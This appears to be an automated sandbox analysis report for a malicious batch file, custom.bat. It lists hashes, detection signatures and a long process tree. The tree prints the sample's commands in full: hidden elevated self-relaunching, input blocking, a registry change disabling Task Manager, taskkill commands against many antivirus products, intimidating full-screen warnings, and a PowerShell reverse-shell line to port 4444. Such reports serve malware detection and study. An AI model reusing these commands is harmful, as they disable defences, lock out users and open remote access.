14605d58982699c2f8067cde3109563286dbf18cc233b4ec6036ccb60930403f

Analysis

max time kernel
5s
max time network
31s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
08-09-2024 06:56

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

custom.bat
Size

4KB
MD5

89f798a5159a32183eb30196d01f1332
SHA1

a9d25c229a0c10acdc45afdb75d67a8b986cd4f0
SHA256

14605d58982699c2f8067cde3109563286dbf18cc233b4ec6036ccb60930403f
SHA512

add8be87d110b65818a30ef77fc3e9e708b810d9e982693525a9ce11d6e1c7f1fda8d3486b80c21a928902705c113a98a069f88fd2274fec152b6aa13f7df1f0
SSDEEP

96:oDmjh7cQGQI9cQITKlQI9uO3DPVqdCgNlWroMu7eQ/Gx6fGfZUX9fQ1ZXkNQI9Iu:oCN7hsTPsdCgVM0emG8bx

Score

8^/10

evasion execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2804	powershell.exe
2932	powershell.exe
1588	powershell.exe
2188	powershell.exe
280	powershell.exe
2628	powershell.exe
2188	powershell.exe
2576	powershell.exe
3044	powershell.exe
2408	powershell.exe
1764	powershell.exe
2880	powershell.exe
1612	powershell.exe
2708	powershell.exe
1048	powershell.exe
2836	powershell.exe
1264	powershell.exe
444	powershell.exe
532	powershell.exe
2428	powershell.exe
2952	powershell.exe
1700	powershell.exe
2928	powershell.exe
492	powershell.exe
968	powershell.exe
2588	powershell.exe
1700	powershell.exe
1228	powershell.exe
2800	powershell.exe
2108	powershell.exe
2804	powershell.exe
3044	powershell.exe
1868	powershell.exe
2168	powershell.exe
2176	powershell.exe
1756	powershell.exe
2888	powershell.exe
2400	powershell.exe
1428	powershell.exe
1844	powershell.exe
2044	powershell.exe
2108	powershell.exe
2620	powershell.exe
3056	powershell.exe
1664	powershell.exe
2900	powershell.exe
2748	powershell.exe
2668	powershell.exe
2588	powershell.exe
1304	powershell.exe
492	powershell.exe
2468	powershell.exe
1160	powershell.exe
2108	powershell.exe
840	powershell.exe
1220	powershell.exe
1904	powershell.exe
2232	powershell.exe
2380	powershell.exe
1760	powershell.exe
1060	powershell.exe
2112	powershell.exe
2156	powershell.exe
2540	powershell.exe

Disables Task Manager via registry modification
evasion

Kills process with taskkill 64 IoCs

evasion

pid	Process
1584	taskkill.exe
2776	taskkill.exe
1976	taskkill.exe
2752	taskkill.exe
2156	taskkill.exe
1724	taskkill.exe
904	taskkill.exe
1724	taskkill.exe
1828	taskkill.exe
344	taskkill.exe
2768	taskkill.exe
1676	taskkill.exe
2600	taskkill.exe
2400	taskkill.exe
1660	taskkill.exe
2848	taskkill.exe
2480	taskkill.exe
1912	taskkill.exe
428	taskkill.exe
1628	taskkill.exe
2408	taskkill.exe
2660	taskkill.exe
2124	taskkill.exe
2896	taskkill.exe
3048	taskkill.exe
2892	taskkill.exe
1304	taskkill.exe
2592	taskkill.exe
1716	taskkill.exe
784	taskkill.exe
2920	taskkill.exe
1608	taskkill.exe
2136	taskkill.exe
2416	taskkill.exe
2444	taskkill.exe
2112	taskkill.exe
1912	taskkill.exe
1188	taskkill.exe
1760	taskkill.exe
1596	taskkill.exe
2868	taskkill.exe
3056	taskkill.exe
2136	taskkill.exe
2056	taskkill.exe
1616	taskkill.exe
2428	taskkill.exe
1560	taskkill.exe
2560	taskkill.exe
2968	taskkill.exe
2060	taskkill.exe
2024	taskkill.exe
2444	taskkill.exe
2892	taskkill.exe
2380	taskkill.exe
2900	taskkill.exe
2112	taskkill.exe
2712	taskkill.exe
2128	taskkill.exe
2740	taskkill.exe
1368	taskkill.exe
2396	taskkill.exe
1304	taskkill.exe
2256	taskkill.exe
3064	taskkill.exe

Suspicious behavior: EnumeratesProcesses 52 IoCs

pid	Process
3044	powershell.exe
3044	powershell.exe
3044	powershell.exe
2408	powershell.exe
2480	powershell.exe
2408	powershell.exe
2408	powershell.exe
2964	powershell.exe
2952	powershell.exe
2952	powershell.exe
2952	powershell.exe
492	powershell.exe
2680	powershell.exe
492	powershell.exe
492	powershell.exe
1264	powershell.exe
2024	powershell.exe
1264	powershell.exe
1264	powershell.exe
2400	powershell.exe
1316	powershell.exe
444	powershell.exe
1092	powershell.exe
444	powershell.exe
444	powershell.exe
2208	powershell.exe
1764	powershell.exe
2232	powershell.exe
2588	powershell.exe
2412	powershell.exe
264	powershell.exe
2804	powershell.exe
1764	powershell.exe
1764	powershell.exe
2256	powershell.exe
2112	powershell.exe
628	powershell.exe
2180	powershell.exe
2328	powershell.exe
2044	powershell.exe
968	powershell.exe
2152	powershell.exe
2252	powershell.exe
2156	powershell.exe
2804	powershell.exe
2804	powershell.exe
1304	powershell.exe
2588	powershell.exe
1160	powershell.exe
968	powershell.exe
968	powershell.exe
1868	powershell.exe

Suspicious use of AdjustPrivilegeToken 34 IoCs

description	pid	Process
Token: SeDebugPrivilege	3044	powershell.exe
Token: SeDebugPrivilege	2408	powershell.exe
Token: SeDebugPrivilege	2480	powershell.exe
Token: SeDebugPrivilege	2964	powershell.exe
Token: SeDebugPrivilege	2952	powershell.exe
Token: SeDebugPrivilege	492	powershell.exe
Token: SeDebugPrivilege	2680	powershell.exe
Token: SeDebugPrivilege	1264	powershell.exe
Token: SeDebugPrivilege	2024	powershell.exe
Token: SeDebugPrivilege	2400	powershell.exe
Token: SeDebugPrivilege	1316	powershell.exe
Token: SeDebugPrivilege	444	powershell.exe
Token: SeDebugPrivilege	1092	powershell.exe
Token: SeDebugPrivilege	2208	powershell.exe
Token: SeDebugPrivilege	1764	powershell.exe
Token: SeDebugPrivilege	2232	powershell.exe
Token: SeDebugPrivilege	2588	powershell.exe
Token: SeDebugPrivilege	2412	powershell.exe
Token: SeDebugPrivilege	264	powershell.exe
Token: SeDebugPrivilege	2804	powershell.exe
Token: SeDebugPrivilege	2256	powershell.exe
Token: SeDebugPrivilege	2112	powershell.exe
Token: SeDebugPrivilege	628	powershell.exe
Token: SeDebugPrivilege	2180	powershell.exe
Token: SeDebugPrivilege	2328	powershell.exe
Token: SeDebugPrivilege	2044	powershell.exe
Token: SeDebugPrivilege	968	powershell.exe
Token: SeDebugPrivilege	2152	powershell.exe
Token: SeDebugPrivilege	2252	powershell.exe
Token: SeDebugPrivilege	2156	powershell.exe
Token: SeDebugPrivilege	1304	powershell.exe
Token: SeDebugPrivilege	2588	powershell.exe
Token: SeDebugPrivilege	1160	powershell.exe
Token: SeDebugPrivilege	1868	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1800 wrote to memory of 2356	1800	cmd.exe	31
PID 1800 wrote to memory of 2356	1800	cmd.exe	31
PID 1800 wrote to memory of 2356	1800	cmd.exe	31
PID 2356 wrote to memory of 3044	2356	cmd.exe	33
PID 2356 wrote to memory of 3044	2356	cmd.exe	33
PID 2356 wrote to memory of 3044	2356	cmd.exe	33
PID 3044 wrote to memory of 2340	3044	powershell.exe	34
PID 3044 wrote to memory of 2340	3044	powershell.exe	34
PID 3044 wrote to memory of 2340	3044	powershell.exe	34
PID 2340 wrote to memory of 2408	2340	cmd.exe	37
PID 2340 wrote to memory of 2408	2340	cmd.exe	37
PID 2340 wrote to memory of 2408	2340	cmd.exe	37
PID 2356 wrote to memory of 2480	2356	cmd.exe	36
PID 2356 wrote to memory of 2480	2356	cmd.exe	36
PID 2356 wrote to memory of 2480	2356	cmd.exe	36
PID 2408 wrote to memory of 3000	2408	powershell.exe	38
PID 2408 wrote to memory of 3000	2408	powershell.exe	38
PID 2408 wrote to memory of 3000	2408	powershell.exe	38
PID 3000 wrote to memory of 2952	3000	cmd.exe	40
PID 3000 wrote to memory of 2952	3000	cmd.exe	40
PID 3000 wrote to memory of 2952	3000	cmd.exe	40
PID 2340 wrote to memory of 2964	2340	cmd.exe	41
PID 2340 wrote to memory of 2964	2340	cmd.exe	41
PID 2340 wrote to memory of 2964	2340	cmd.exe	41
PID 2480 wrote to memory of 2664	2480	powershell.exe	42
PID 2480 wrote to memory of 2664	2480	powershell.exe	42
PID 2480 wrote to memory of 2664	2480	powershell.exe	42
PID 2964 wrote to memory of 2456	2964	powershell.exe	43
PID 2964 wrote to memory of 2456	2964	powershell.exe	43
PID 2964 wrote to memory of 2456	2964	powershell.exe	43
PID 2952 wrote to memory of 2192	2952	powershell.exe	44
PID 2952 wrote to memory of 2192	2952	powershell.exe	44
PID 2952 wrote to memory of 2192	2952	powershell.exe	44
PID 2192 wrote to memory of 492	2192	cmd.exe	112
PID 2192 wrote to memory of 492	2192	cmd.exe	112
PID 2192 wrote to memory of 492	2192	cmd.exe	112
PID 3000 wrote to memory of 2680	3000	cmd.exe	92
PID 3000 wrote to memory of 2680	3000	cmd.exe	92
PID 3000 wrote to memory of 2680	3000	cmd.exe	92
PID 2680 wrote to memory of 300	2680	powershell.exe	48
PID 2680 wrote to memory of 300	2680	powershell.exe	48
PID 2680 wrote to memory of 300	2680	powershell.exe	48
PID 492 wrote to memory of 2364	492	powershell.exe	49
PID 492 wrote to memory of 2364	492	powershell.exe	49
PID 492 wrote to memory of 2364	492	powershell.exe	49
PID 2364 wrote to memory of 1264	2364	cmd.exe	51
PID 2364 wrote to memory of 1264	2364	cmd.exe	51
PID 2364 wrote to memory of 1264	2364	cmd.exe	51
PID 2192 wrote to memory of 2024	2192	cmd.exe	52
PID 2192 wrote to memory of 2024	2192	cmd.exe	52
PID 2192 wrote to memory of 2024	2192	cmd.exe	52
PID 1264 wrote to memory of 1640	1264	powershell.exe	53
PID 1264 wrote to memory of 1640	1264	powershell.exe	53
PID 1264 wrote to memory of 1640	1264	powershell.exe	53
PID 2340 wrote to memory of 2400	2340	cmd.exe	55
PID 2340 wrote to memory of 2400	2340	cmd.exe	55
PID 2340 wrote to memory of 2400	2340	cmd.exe	55
PID 2024 wrote to memory of 2272	2024	powershell.exe	56
PID 2024 wrote to memory of 2272	2024	powershell.exe	56
PID 2024 wrote to memory of 2272	2024	powershell.exe	56
PID 2364 wrote to memory of 1316	2364	cmd.exe	57
PID 2364 wrote to memory of 1316	2364	cmd.exe	57
PID 2364 wrote to memory of 1316	2364	cmd.exe	57
PID 1640 wrote to memory of 444	1640	cmd.exe	58

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\custom.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1800
- C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2356
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3044
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2340
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2408
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2952
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2192
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:492
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        10⤵
        Suspicious use of WriteProcessMemory
        
        PID:2364
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1264
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        12⤵
        Suspicious use of WriteProcessMemory
        
        PID:1640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        13⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:444
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        14⤵
        
        PID:1872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        15⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1764
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        16⤵
        
        PID:2860
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        17⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2804
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        18⤵
        
        PID:1632
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        19⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:968
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        20⤵
        
        PID:1788
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        21⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1868
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        22⤵
        
        PID:2828
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2168
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        24⤵
        
        PID:644
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2176
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        26⤵
        
        PID:1076
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2628
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        28⤵
        
        PID:2744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2708
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        30⤵
        
        PID:2504
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2576
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        32⤵
        
        PID:3028
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2932
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        34⤵
        
        PID:1808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:532
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        36⤵
        
        PID:2100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2800
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        38⤵
        
        PID:1264
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2400
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        40⤵
        
        PID:268
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\custom.bat /min' -Verb runAs"
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1588
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
        42⤵
        
        PID:1772
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        41⤵
        
        PID:1188
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        41⤵
        
        PID:2156
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        41⤵
        
        PID:2328
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        41⤵
        
        PID:1536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        41⤵
        
        PID:2428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:280
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1160
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        41⤵
        
        PID:1656
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        41⤵
        
        PID:2208
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        41⤵
        
        PID:532
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        41⤵
        
        PID:2576
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        41⤵
        Kills process with taskkill
        
        PID:2920
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        41⤵
        
        PID:1060
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        41⤵
        
        PID:2064
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        41⤵
        
        PID:872
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        41⤵
        
        PID:1544
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        41⤵
        Kills process with taskkill
        
        PID:2900
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Panda.exe /F
        41⤵
        
        PID:2908
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM EsetService.exe /F
        41⤵
        
        PID:1664
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
        41⤵
        
        PID:2468
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1060
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dpmtgcuv.cmdline"
        40⤵
        
        PID:2540
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        39⤵
        
        PID:2836
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        39⤵
        
        PID:2024
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        39⤵
        
        PID:1368
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        39⤵
        
        PID:1828
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        39⤵
        
        PID:2992
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        39⤵
        
        PID:1560
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        39⤵
        
        PID:1068
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        39⤵
        
        PID:2636
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        39⤵
        
        PID:2080
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        39⤵
        Kills process with taskkill
        
        PID:2740
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        39⤵
        
        PID:2788
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        39⤵
        
        PID:2516
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        39⤵
        
        PID:2444
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        39⤵
        Kills process with taskkill
        
        PID:1976
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        39⤵
        
        PID:2992
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Panda.exe /F
        39⤵
        Kills process with taskkill
        
        PID:1560
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM EsetService.exe /F
        39⤵
        
        PID:1760
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
